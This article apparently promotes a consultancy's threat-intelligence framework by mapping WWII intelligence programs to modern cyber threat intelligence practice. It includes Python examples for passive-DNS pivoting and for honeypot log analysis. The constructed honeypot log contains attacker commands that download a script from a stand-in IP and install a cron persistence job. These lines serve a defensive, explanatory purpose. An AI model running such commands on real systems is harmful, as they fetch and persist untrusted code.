# The PDM Through History: How WWII Intelligence Operations Mirror Modern CTI
Every tool in the modern cyber threat intelligence toolkit has a direct precedent in the intelligence operations of the Second World War. Not a loose analogy. Not an inspirational parallel. A structural precedent: the same functional requirements, the same operational challenges, the same failure modes, solved by different technologies in service of the same goal.
The goal is Predictive Defense Intelligence (PDI): see the threat before it sees you. CDA's PDI methodology governs TID (Threat Intelligence and Defense), the atmospheric layer of the Planetary Defense Model that exists to detect threats before they reach terrain, identify adversaries before they reach civilization, and produce actionable intelligence before attackers reach the core.
In 1939, that meant signals intelligence from decrypted Enigma traffic, human intelligence from turned double agents, strategic deception through fabricated order-of-battle data, and open-source intelligence assembled by hundreds of analysts in Washington and London. In 2026, it means SIEM platforms, threat intelligence feeds, adversary simulation red teams, honeypots, and OSINT aggregation. The operators are different. The discipline is identical.
This article examines six specific WWII intelligence programs and maps each to a component of modern cyber threat intelligence. The argument is not that studying history will make you a better analyst, though it might. The argument is that the CTI discipline practitioners treat as emerging is not emerging at all. It is mature. Its first practitioners worked in attic offices in Bletchley Park and basement rooms in London. The lessons they learned, paid for with operational risk and sometimes catastrophic failure, are encoded in the frameworks CTI practitioners use today, often without knowing where they came from.
Operation Ultra was the Allied signals intelligence program built on the cryptanalysis of German Enigma machine traffic. The Enigma was a commercial cipher machine adopted by the German military and modified with additional security rotors: it produced polyalphabetic substitution ciphers that changed with every keystroke, theoretically producing an astronomical number of possible configurations. German operators and commanders believed it was unbreakable.
It was not. The Polish Cipher Bureau had already made substantial progress against early Enigma variants by 1939. When Poland was overrun, the Polish cryptanalysts shared their work with British and French counterparts. At Bletchley Park, a team that eventually grew to over 10,000 people, working in shifts around the clock, broke Enigma traffic operationally for the first time in 1940. By the height of the war, Bletchley was reading Luftwaffe, Army, and Naval Enigma traffic within hours of transmission.
Ultra is technical intelligence (TECHINT) and signals intelligence (SIGINT) in their modern forms. The Enigma break is a cryptanalytic operation, which maps to modern cryptographic vulnerability research and traffic analysis. The sustained processing of decrypted traffic, categorizing messages by sender, recipient, content type, and operational significance, maps to what modern CTI platforms call structured threat intelligence: raw signals processed into analyzed, contextualized intelligence products.
The PDI methodology's tagline, "See the threat before it sees you," was operationalized at Bletchley Park before the term threat intelligence existed. When Ultra produced intelligence indicating German submarine positions in the North Atlantic, convoy routes were altered before contact. The threat was seen, and the defended asset (the convoy) was moved. That is PDI in its purest form: not detecting the attack in progress but shaping the environment before the attack can be initiated.
The failure mode Ultra eventually confronted is the same failure mode facing modern SIGINT-derived CTI: intelligence that is acted upon in ways that reveal its existence to the adversary. The Allies developed strict protocols for how Ultra intelligence could be used operationally, always requiring a plausible alternative explanation for how the information was obtained. A convoy that always diverted precisely when a submarine was in its path would eventually tell the German Navy that their communications were being read. The same discipline applies to modern threat intelligence: acting on intelligence without revealing the collection mechanism is both an operational security requirement and a long-term capability preservation strategy.
By 1941, MI5 had successfully captured or turned every German intelligence agent operating in Britain. Rather than simply arresting them, MI5's Double Cross Committee, formally known as the Twenty Committee for the Roman numeral XX, ran the agents as double agents: feeding Germany carefully constructed disinformation that appeared genuine, contained enough accurate low-value information to maintain credibility, and guided German intelligence toward false conclusions about Allied capabilities, intentions, and order-of-battle.
The Double Cross System is the direct precedent for two modern CTI tools: deception technology and honeypots.
Deception technology, in modern CTI, places false assets (fake servers, fake credentials, fake data stores) in an environment to attract attackers and collect intelligence on their techniques, while keeping them occupied with assets that have no real value. The Double Cross agents were exactly this: false assets that appeared to be high-value sources of genuine intelligence but were completely under Allied control. Germany invested significant operational resources in running agent networks that were feeding their adversaries information and providing MI5 with detailed visibility into German intelligence priorities and collection methods.
Honeypots operate on the same logic at the network level: a system designed to attract adversary activity, appear vulnerable, and log everything the attacker does in enough detail to identify their techniques, tools, and procedures. An adversary who targets a honeypot reveals their methodology, their tooling, and often their operational pattern, without gaining access to anything of value. The Double Cross agents, from the adversary's perspective, were legitimate intelligence sources. From MI5's perspective, they were detailed windows into German intelligence operations.
MITRE ATT&CK, the adversary behavior framework that modern CTI teams use to map threat actor techniques, is structured around exactly what MI5 was building from Double Cross reporting: a model of how a specific adversary thinks, what tools they prefer, what methods they use for communications, and how they prioritize intelligence collection. The Twenty Committee's operational records are an early version of an ATT&CK threat actor profile.
Operation Fortitude was the strategic deception operation that preceded the D-Day landings in June 1944. Its purpose was to convince the German High Command that the primary Allied landing in France would come at the Pas-de-Calais rather than Normandy, and that even after the Normandy landings began, the main invasion was still to come. To accomplish this, Fortitude created a fictitious army group commanded by General George Patton, fabricated radio traffic and supply movements, used Double Cross agents to reinforce the deception, and managed the Allied bombing campaign to attack Pas-de-Calais infrastructure at a ratio that suggested it was the primary target.
Fortitude was adversary simulation operating offensively: Allied planners modeled German intelligence collection methods, German analytical frameworks, and German command decision-making, then crafted a picture that would produce the desired conclusion in a German analyst's mind. They were not just creating false information. They were creating false information specifically tailored to how the adversary processed information.
This is precisely what a red team does. A modern adversary simulation engagement does not simply test whether defenses can detect generic attack traffic. It replicates the specific techniques, tools, and operational patterns of a named threat actor, testing whether the defending organization's detection capability can identify activity that matches a real adversary's fingerprint rather than a generic attacker's behavior. Fortitude was a red team exercise at strategic scale: model the adversary, think like the adversary, produce outputs that the adversary's analytical process will interpret as genuine.
The lesson for modern CTI is that adversary simulation requires genuine threat actor modeling. Fortitude succeeded because Allied intelligence had a detailed understanding of how German intelligence operated, what sources they trusted, how their analytical process worked, and what conclusions they were predisposed to reach. A red team engagement that does not begin with specific threat actor intelligence is not adversary simulation. It is generic penetration testing.
The Special Operations Executive, established by Churchill in July 1940 with instructions to "set Europe ablaze," was a clandestine operations organization that conducted sabotage, subversion, and support for resistance movements across Occupied Europe and Asia. SOE operated behind enemy lines through networks of locally recruited agents, trained at secret facilities in Britain, and inserted by parachute or clandestine boat landing.
SOE's operational toolkit maps almost exactly to what modern security operations calls offensive cyber capability. Sabotage of enemy infrastructure (rail lines, power stations, communications facilities) is the equivalent of disruption operations targeting critical infrastructure. The creation and management of agent networks in denied territory is the equivalent of persistent access operations: establishing a presence in a network, maintaining it covertly over time, and using it when operational requirements demand. SOE's communications security, using one-time pad ciphers and scheduled transmission windows to reduce radio direction-finding exposure, is operational tradecraft that any red team operator would recognize.
The critical lesson SOE provides for modern CTI is the cost of poor OPSEC at the operator level. When the German counterintelligence service (the Abwehr and later the SD) captured SOE agents in the Netherlands, they forced the agents to continue radio transmissions under German control in an operation known as Englandspiel, or the England Game. SOE's London headquarters, recognizing signs that the network was compromised but choosing not to act on them for organizational and bureaucratic reasons, continued the operation for nearly two years, inadvertently sending agents into German capture.
This is the insider threat and compromised credentials failure mode that IAT and TID must jointly address. The Dutch section's leadership had indicators of compromise, but organizational processes failed to act on them. Every modern CTI program faces the same risk: indicators are present, but the organizational process to escalate and investigate is broken. The Englandspiel is the case study that no analyst who has read it can forget.
The Office of Strategic Services was the American wartime intelligence agency, predecessor to the CIA. Its Research and Analysis Branch, often overlooked in favor of its more dramatic operational divisions, was arguably the most innovative intelligence organization of the war. R&A assembled several hundred academics, economists, historians, geographers, and social scientists and tasked them with producing intelligence assessments from publicly available sources: newspapers, academic journals, commercial shipping records, railroad timetables, patent filings, and captured documents.
The R&A Branch invented Open Source Intelligence (OSINT) as a systematic intelligence discipline. Their analysts understood something that seemed counterintuitive: an adversary engaged in a total war economy cannot fully conceal that economy from public observation. Factory locations, railroad capacity, shipping volumes, fuel consumption rates, and industrial output are all partially visible in publicly available sources if you know how to look and how to aggregate. R&A estimates of German industrial capacity, derived primarily from open sources, proved more accurate than many estimates produced by clandestine collection programs.
Modern OSINT in CTI operates on identical principles. An adversary conducting a campaign against a target cannot fully conceal their infrastructure. Domain registrations, TLS certificate transparency logs, passive DNS, BGP routing tables, GitHub commit histories, code signing certificates, and job postings from threat actor-affiliated organizations all produce observable signals in publicly available data. A skilled OSINT analyst, working the same way R&A's historians worked through European newspaper archives, can map adversary infrastructure, identify tooling patterns, and sometimes attribute activity with confidence from purely open sources.
The R&A precedent matters for a practical reason: most CTI programs underinvest in OSINT relative to its return. Clandestine collection programs are expensive, slow, and sometimes counterproductive. Open source collection is fast, cheap, and often sufficient. R&A's contribution to the Allied victory was disproportionate to its budget precisely because its analysts understood that the most valuable signals were hiding in plain sight.
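The aggregation principle R&A worked by, applied to the infrastructure signals listed above, as an added example that is not CDA's or R&A's own method: it pivots from one seed domain across constructed passive-DNS and certificate-transparency records, and refuses to pivot through an IP that hosts many unrelated tenants, which is how shared hosting and CDNs poison a naive pivot. Every domain, IP and certificate id below is constructed.

```python
"""Added example (not CDA's or R&A's method): pivot from one seed domain across
constructed passive-DNS and certificate-transparency records to map related
infrastructure, refusing to pivot through IPs that look like shared hosting."""
from collections import defaultdict, deque

# Constructed passive-DNS resolutions (domain, ip); documentation ranges only.
PASSIVE_DNS = [
    ("update-cdn-check.example", "198.51.100.20"),
    ("mail-verify-portal.example", "198.51.100.20"),
    ("mail-verify-portal.example", "203.0.113.45"),
    ("secure-docs-share.example", "203.0.113.45"),
    ("update-cdn-check.example", "192.0.2.1"),   # seed once sat on a shared host
    ("shared-blog-one.example", "192.0.2.1"),
    ("shared-blog-two.example", "192.0.2.1"),
    ("shared-blog-three.example", "192.0.2.1"),
]

# Constructed CT entries (certificate id placeholder, subject alternative names).
CT_LOG = [
    ("CERT-PLACEHOLDER-1", ["secure-docs-share.example", "login-docs-share.example"]),
    ("CERT-PLACEHOLDER-2", ["unrelated-shop.example"]),
]

HUB_THRESHOLD = 3  # an IP hosting more domains than this is treated as shared hosting

def build_graph(pdns, ct, hub_threshold=HUB_THRESHOLD):
    """Bipartite graph of ("domain", d) nodes and ("ip", x) / ("cert", c) pivot nodes.
    Hub IPs are dropped so a CDN or shared host cannot join unrelated tenants."""
    adj = defaultdict(set)
    ip_domains = defaultdict(set)
    for domain, ip in pdns:
        ip_domains[ip].add(domain)
    for ip, domains in ip_domains.items():
        if len(domains) > hub_threshold:
            continue
        for d in domains:
            adj[("domain", d)].add(("ip", ip))
            adj[("ip", ip)].add(("domain", d))
    for cert, sans in ct:
        for d in sans:
            adj[("domain", d)].add(("cert", cert))
            adj[("cert", cert)].add(("domain", d))
    return adj

def pivot(adj, seed, max_pivots=2):
    """Breadth-first pivot from seed. Returns {domain: pivots_from_seed}, where
    one pivot is reaching a new domain through a shared IP or certificate."""
    start = ("domain", seed)
    depth = {start: 0}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nxt in adj.get(node, ()):
            if nxt in depth:
                continue
            d = depth[node] + (1 if nxt[0] == "domain" else 0)
            if d > max_pivots:
                continue
            depth[nxt] = d
            queue.append(nxt)
    return {n[1]: d for n, d in depth.items() if n[0] == "domain"}

if __name__ == "__main__":
    print(pivot(build_graph(PASSIVE_DNS, CT_LOG), "update-cdn-check.example", 3))
```

Raising `hub_threshold` above the size of the shared host shows the failure mode: the three unrelated blog domains join the cluster at one pivot from the seed.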
Every modern CTI framework, from NIST SP 800-150's guidance on cyber threat information sharing to the frameworks used by threat intelligence platforms like Recorded Future and Mandiant, organizes intelligence work around a cycle of six phases: requirements definition, collection, processing, analysis, dissemination, and feedback.
That cycle is not a modern invention. It is the formalization of a process that the British Joint Intelligence Committee, established in 1936 and fully operational by the start of the war, developed to coordinate intelligence production across MI5, MI6, the Service intelligence directorates, and Ultra. The cycle emerged because the alternative, uncoordinated parallel intelligence programs producing redundant or conflicting products for the same consumers, generated confusion that cost lives. The cycle was a management solution to an organizational problem.
Modern CTI programs that fail to implement the cycle consistently produce the same failure mode: collection without requirements, analysis without structured methodology, dissemination that reaches the wrong consumers in the wrong format at the wrong time, and no feedback mechanism to improve future production. The result is intelligence products that are technically accurate but operationally useless.
Requirements definition tells the collection function what the consumer actually needs to know, not what is interesting to collect. Collection without requirements produces data lakes, not intelligence. Processing converts raw collection into formats that analysis can work with. Analysis transforms processed data into assessments that answer the consumer's questions. Dissemination gets the assessment to the decision-maker in time to influence a decision. Feedback closes the loop, telling the collection and analysis functions whether the product was useful and what needs to change.
The wartime Joint Intelligence Committee worked exactly this way. The failure at Pearl Harbor, where significant intelligence indicators were available but failed to reach decision-makers in actionable form, is a dissemination failure within the intelligence cycle. The success of Operation Overlord intelligence preparation, where assessments built from Ultra, agent reporting, aerial reconnaissance, and R&A analysis produced an accurate picture of German defensive dispositions in Normandy, is the cycle operating at full effectiveness.
The discipline of cyber threat intelligence is treated, in most of its practitioner literature, as an emerging field. It is not. It is a 90-year-old field applied to a new technical medium.
This matters for practitioners because the failure modes are not new. Confirmation bias in analysis, which led British intelligence to misread indicators before the German invasion of Norway in 1940, is the same confirmation bias that leads modern SOC analysts to dismiss anomalous activity that does not match the current threat model. The Englandspiel's failure to act on indicators of compromise is the same organizational inertia that allows modern intrusions to persist undetected for 200-plus days. R&A's open-source discipline, which produced better estimates than expensive clandestine programs, is the same lesson that OSINT-focused CTI teams rediscover every year.
Understanding the historical precedent makes the PDI methodology more than a tagline. "See the threat before it sees you" is a compression of everything Ultra, the Double Cross System, Fortitude, SOE, and R&A built and proved. The atmospheric layer of the PDM does not react to attacks that have already landed on the terrain. It extends visibility outward, past the curtain walls, to where adversary preparation is visible before the approach begins.
TID (Threat Intelligence and Defense) is the PDM's atmospheric layer, and the PDI methodology is its governing framework. CDA's approach to TID is structured around the intelligence cycle, not around tool categories. The question is not whether an organization has a SIEM or a threat intelligence platform. The question is whether the intelligence production cycle is operating effectively: are requirements driving collection, is collection producing analyzable data, is analysis producing actionable assessments, are assessments reaching the right consumers, and is feedback improving the next cycle?
Bletchley Park had hundreds of analysts and a mature production cycle. A modern SOC with three analysts and a SIEM can implement the same cycle at appropriate scale. The organizational discipline matters more than the tooling budget.
The Double Cross parallel to deception technology has direct implications for TID operations. Organizations that deploy honeypots without a process for analyzing the intelligence they collect are building a watchtower and then not staffing it. The honeypot is collection infrastructure. The intelligence value requires analysis: what TTPs did the adversary demonstrate, how do those TTPs match known threat actor profiles, what do the targeting choices reveal about adversary priorities?
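The analysis step described here, and the ATT&CK profile-building the Double Cross section attributes to MI5, as an added example that is not CDA's code: it parses constructed honeypot log lines into ATT&CK technique IDs and scores the observed set against two constructed actor profiles. The event vocabulary, the matching rules and the actor profiles are assumptions; only the technique IDs are real ATT&CK identifiers.

```python
"""Added example (not CDA's code): turn constructed honeypot events into
ATT&CK technique IDs and score them against constructed actor profiles."""
import re
from collections import Counter

# Constructed honeypot log, "<timestamp> <source_ip> <event> <detail>" per line.
HONEYPOT_LOG = """\
2026-01-10T02:14:01Z 203.0.113.7 ssh_login_failed user=root
2026-01-10T02:14:02Z 203.0.113.7 ssh_login_failed user=admin
2026-01-10T02:14:03Z 203.0.113.7 ssh_login_failed user=oracle
2026-01-10T02:14:09Z 203.0.113.7 ssh_login_ok user=admin
2026-01-10T02:14:15Z 203.0.113.7 shell_cmd cmd="uname -a; cat /etc/os-release"
2026-01-10T02:14:40Z 203.0.113.7 shell_cmd cmd="wget http://198.51.100.9/x.sh -O /tmp/x.sh"
2026-01-10T02:14:52Z 203.0.113.7 shell_cmd cmd="echo '* * * * * /tmp/x.sh' | crontab -"
"""

# Event -> ATT&CK Enterprise technique. The IDs are real MITRE ATT&CK
# identifiers; the event names and matching rules are this example's own.
TTP_RULES = [
    (lambda e: e["event"] == "ssh_login_failed", "T1110"),   # Brute Force
    (lambda e: e["event"] == "ssh_login_ok", "T1078"),       # Valid Accounts
    (lambda e: e["event"] == "shell_cmd", "T1059.004"),      # Unix Shell
    (lambda e: e["event"] == "shell_cmd"
        and re.search(r"\b(wget|curl)\b", e["detail"]), "T1105"),  # Ingress Tool Transfer
    (lambda e: e["event"] == "shell_cmd"
        and "uname" in e["detail"], "T1082"),                # System Information Discovery
    (lambda e: e["event"] == "shell_cmd"
        and "crontab" in e["detail"], "T1053.003"),          # Scheduled Task/Job: Cron
]

# Constructed actor profiles: hypothetical, not real threat groups.
ACTOR_PROFILES = {
    "ACTOR-A (constructed)": {"T1110", "T1078", "T1059.004", "T1105", "T1053.003"},
    "ACTOR-B (constructed)": {"T1190", "T1059.001", "T1047", "T1021.002"},
}

def parse_events(log):
    """Split each line into timestamp, source IP, event name and detail."""
    events = []
    for line in log.splitlines():
        ts, src, event, detail = line.split(" ", 3)
        events.append({"ts": ts, "src": src, "event": event, "detail": detail})
    return events

def extract_ttps(events):
    """Count how often each ATT&CK technique was demonstrated in the honeypot."""
    observed = Counter()
    for e in events:
        for matches, ttp in TTP_RULES:
            if matches(e):
                observed[ttp] += 1
    return observed

def score_profiles(observed_ttps):
    """Jaccard overlap between observed techniques and each profile, best match
    first. Overlap supports a hypothesis about the actor; it is not attribution."""
    observed = set(observed_ttps)
    scores = [(actor, round(len(observed & prof) / len(observed | prof), 3))
              for actor, prof in ACTOR_PROFILES.items()]
    return sorted(scores, key=lambda s: s[1], reverse=True)

if __name__ == "__main__":
    print(score_profiles(extract_ttps(parse_events(HONEYPOT_LOG))))
```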
Operation Fortitude's red team parallel speaks to a gap in most TID programs: adversary modeling. The PDI methodology requires understanding not just what threats exist but how specific threat actors think, what they prioritize, and how their decision-making process works. That is the intelligence that allows a defender to shape the environment before the attack rather than react to it after.
The R&A OSINT precedent is the operational argument for OSINT investment in every TID program. Open source collection is undervalued because it is not classified and does not require expensive tooling. The best intelligence on many threat actor groups is visible in public data for any analyst disciplined enough to look systematically.
The Shield diagnostic, CDA's PDM visualization tool, plots TID as the fifth ring from the core. A strong TID ring means the atmosphere is filtering threats before they reach terrain (SPH), civilization (IAT), or the core (DPS). A degraded TID ring means the organization is discovering attacks only after they have landed. WWII proved what a strong intelligence capability is worth. It proved equally clearly what its absence costs.
Written by Evan Morgan